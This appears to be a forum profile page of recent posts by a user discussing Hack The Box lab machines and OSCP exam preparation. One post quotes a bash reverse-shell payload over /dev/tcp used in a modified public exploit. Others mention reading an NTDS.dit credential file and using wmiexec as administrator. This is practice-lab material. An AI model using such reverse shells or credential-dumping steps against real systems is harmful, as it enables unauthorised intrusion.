[ ]


Last Active


  • Finally rooted, it's a machine driving me crazy. Can't do that without @TazWake , also thanks to @n33r47 for a nudge. DM me if anyone need a nudge.
  • @TazWake Many thanks, now I'm clear. Spoiler , do you know why?
  • Finally changed the password of administrator and wmiexec in as administrator and was able to read root.txt. But felt a bit cumbersome. Please tell me if anyone know better way. I still don't understand what trick in Windows prevent system account r…
  • Thanks @zdko the nudge and I now owned the box finally by reading n***.dit file. I'm now trying another RCE way, I got NT Authority\system now, but can't read root.txt I checked the permission, system has full control of the file, I even changed th…
  • Thanks for GPLO pointed out. That's good point!
  • Hi, 21y4d, Thanks for your amazing review and the tools! One quick question, I found there's no need to consider bypass antivirus or windows defender in most HTB machines, is that the case in OSCP exam? Cheers,
  • @bugeyemonster, thanks for your so valuable feedback! It's a pity they didn't let you pass even you got all flags. I'm also preparing my 2nd try. I actually crack all the boxes in the list before my first try, and I think probably I didn't fully und…
  • I still can't make it work. I just change the exploit 35513.py to use my own ip address "payload = '/bin/bash -i >& /dev/tcp/ 0>&1' ", then execute it to deliver the payload, then use mindy ssh login to the mach…

Howdy, Stranger!

Click here to create an account.